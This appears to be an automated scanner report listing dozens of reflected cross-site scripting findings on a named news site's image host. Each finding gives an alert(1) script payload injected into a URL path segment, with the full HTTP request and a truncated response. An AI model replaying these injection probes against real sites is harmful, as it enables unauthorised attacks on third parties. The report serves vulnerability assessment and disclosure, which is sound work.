The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a1902<script>alert(1)</script>bae752c150b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/11a1902<script>alert(1)</script>bae752c150b/08/170x128-alg_chilean_minor_marathon.jpg HTTP/1.1 Host: assets.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289176426582:ss=1289176426582
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:09:39 GMT Server: Apache Content-Length: 112 nnCoection: close Content-Type: text/html Content-Language: en Connection: keep-alive
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 923eb<script>alert(1)</script>3060b2c140b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/11/08923eb<script>alert(1)</script>3060b2c140b/170x128-alg_chilean_minor_marathon.jpg HTTP/1.1 Host: assets.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289176426582:ss=1289176426582
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:10:39 GMT Server: Apache Content-Length: 112 nnCoection: close Content-Type: text/html Content-Language: en Connection: keep-alive
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2f747<script>alert(1)</script>fb98c6e55d8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img2f747<script>alert(1)</script>fb98c6e55d8/2010/11/08/170x128-alg_disney_story.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:06 GMT Server: Apache Content-Length: 102 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c632d<script>alert(1)</script>922c87da0ce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010c632d<script>alert(1)</script>922c87da0ce/11/08/170x128-alg_disney_story.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:09 GMT Server: Apache Content-Length: 102 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c15ae<script>alert(1)</script>aa83097562e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/11c15ae<script>alert(1)</script>aa83097562e/08/170x128-alg_disney_story.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:12 GMT Server: Apache Content-Length: 102 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9580e<script>alert(1)</script>f8c441915f6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/11/089580e<script>alert(1)</script>f8c441915f6/170x128-alg_disney_story.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:36 GMT Server: Apache Content-Length: 102 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ba625<script>alert(1)</script>3c07ea638f8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /imgba625<script>alert(1)</script>3c07ea638f8/2010/11/08/170x128-alg_knicks_williams.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:02 GMT Server: Apache Content-Length: 105 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d3f40<script>alert(1)</script>158b2445ede was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010d3f40<script>alert(1)</script>158b2445ede/11/08/170x128-alg_knicks_williams.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:08 GMT Server: Apache Content-Length: 105 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 73fad<script>alert(1)</script>2983a93e070 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/1173fad<script>alert(1)</script>2983a93e070/08/170x128-alg_knicks_williams.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:11 GMT Server: Apache Content-Length: 105 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 462d3<script>alert(1)</script>3d4a8ecb8f1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/11/08462d3<script>alert(1)</script>3d4a8ecb8f1/170x128-alg_knicks_williams.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:12 GMT Server: Apache Content-Length: 105 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 528f1<script>alert(1)</script>a97c9692395 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img528f1<script>alert(1)</script>a97c9692395/2010/11/08/170x128-alg_resize_karina-smirnoff_brad-penny.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:06 GMT Server: Apache Content-Length: 123 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ae308<script>alert(1)</script>b9f49d80b91 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010ae308<script>alert(1)</script>b9f49d80b91/11/08/170x128-alg_resize_karina-smirnoff_brad-penny.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:09 GMT Server: Apache Content-Length: 123 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload cb826<script>alert(1)</script>121d8bcc6d8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/11cb826<script>alert(1)</script>121d8bcc6d8/08/170x128-alg_resize_karina-smirnoff_brad-penny.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:12 GMT Server: Apache Content-Length: 123 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 97607<script>alert(1)</script>8d4b5634980 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/11/0897607<script>alert(1)</script>8d4b5634980/170x128-alg_resize_karina-smirnoff_brad-penny.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:18 GMT Server: Apache Content-Length: 123 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1edc3<script>alert(1)</script>ebc2fb217e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img1edc3<script>alert(1)</script>ebc2fb217e6/2010/11/08/170x128-alg_resize_shirley-verrett.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:11 GMT Server: Apache Content-Length: 112 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 54b0e<script>alert(1)</script>79351c47bfb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/201054b0e<script>alert(1)</script>79351c47bfb/11/08/170x128-alg_resize_shirley-verrett.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:11 GMT Server: Apache Content-Length: 112 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8c3f5<script>alert(1)</script>329b91d9671 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/118c3f5<script>alert(1)</script>329b91d9671/08/170x128-alg_resize_shirley-verrett.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:14 GMT Server: Apache Content-Length: 112 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload addd2<script>alert(1)</script>957cbad6aad was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/11/08addd2<script>alert(1)</script>957cbad6aad/170x128-alg_resize_shirley-verrett.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:22 GMT Server: Apache Content-Length: 112 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d5d9b<script>alert(1)</script>730b543d566 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /imgd5d9b<script>alert(1)</script>730b543d566/2010/11/08/90x90-alg_chilean_minor_marathon.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:32 GMT Server: Apache Content-Length: 112 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9c1aa<script>alert(1)</script>5078145d21a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/20109c1aa<script>alert(1)</script>5078145d21a/11/08/90x90-alg_chilean_minor_marathon.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:15 GMT Server: Apache Content-Length: 112 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 908f9<script>alert(1)</script>909505e7a8c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/11908f9<script>alert(1)</script>909505e7a8c/08/90x90-alg_chilean_minor_marathon.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:39 GMT Server: Apache Content-Length: 112 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6cded<script>alert(1)</script>162557d17d1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/11/086cded<script>alert(1)</script>162557d17d1/90x90-alg_chilean_minor_marathon.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:22 GMT Server: Apache Content-Length: 112 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 22d64<script>alert(1)</script>6f150587942 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img22d64<script>alert(1)</script>6f150587942/2010/11/08/90x90-alg_jets_braylon_edwards.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:46 GMT Server: Apache Content-Length: 110 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 362ad<script>alert(1)</script>f5d0845e762 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010362ad<script>alert(1)</script>f5d0845e762/11/08/90x90-alg_jets_braylon_edwards.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:51 GMT Server: Apache Content-Length: 110 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3597c<script>alert(1)</script>1125435cde9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/113597c<script>alert(1)</script>1125435cde9/08/90x90-alg_jets_braylon_edwards.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:37 GMT Server: Apache Content-Length: 110 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 376eb<script>alert(1)</script>6bc169632f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/11/08376eb<script>alert(1)</script>6bc169632f/90x90-alg_jets_braylon_edwards.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:44 GMT Server: Apache Content-Length: 109 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 87a77<script>alert(1)</script>44f0d173ee7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img87a77<script>alert(1)</script>44f0d173ee7/2010/11/08/90x90-alg_resize_horse_georgina-bloomberg.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:09 GMT Server: Apache Content-Length: 121 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d4750<script>alert(1)</script>1103ef24c88 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010d4750<script>alert(1)</script>1103ef24c88/11/08/90x90-alg_resize_horse_georgina-bloomberg.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:32 GMT Server: Apache Content-Length: 121 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 33c0e<script>alert(1)</script>c9bdfd63e20 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/1133c0e<script>alert(1)</script>c9bdfd63e20/08/90x90-alg_resize_horse_georgina-bloomberg.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:35 GMT Server: Apache Content-Length: 121 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 78bbd<script>alert(1)</script>f199fac862c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/11/0878bbd<script>alert(1)</script>f199fac862c/90x90-alg_resize_horse_georgina-bloomberg.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:15 GMT Server: Apache Content-Length: 121 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 92b35<script>alert(1)</script>6fc81dc829d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img92b35<script>alert(1)</script>6fc81dc829d/2010/11/08/90x90-alg_resize_karina-smirnoff_brad-penny.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:28 GMT Server: Apache Content-Length: 123 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5c71e<script>alert(1)</script>90ebe98aa0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/20105c71e<script>alert(1)</script>90ebe98aa0/11/08/90x90-alg_resize_karina-smirnoff_brad-penny.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:55 GMT Server: Apache Content-Length: 122 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7fc41<script>alert(1)</script>ae96df71988 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/117fc41<script>alert(1)</script>ae96df71988/08/90x90-alg_resize_karina-smirnoff_brad-penny.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:40 GMT Server: Apache Content-Length: 123 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 938b0<script>alert(1)</script>840fa4289c5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/11/08938b0<script>alert(1)</script>840fa4289c5/90x90-alg_resize_karina-smirnoff_brad-penny.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:47 GMT Server: Apache Content-Length: 123 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7f03d<script>alert(1)</script>12638bd7a72 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img7f03d<script>alert(1)</script>12638bd7a72/2010/11/08/90x90-alg_resize_nyc-marathon_gebre.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:14 GMT Server: Apache Content-Length: 115 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4b505<script>alert(1)</script>d343e1615fb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/20104b505<script>alert(1)</script>d343e1615fb/11/08/90x90-alg_resize_nyc-marathon_gebre.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:17 GMT Server: Apache Content-Length: 115 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
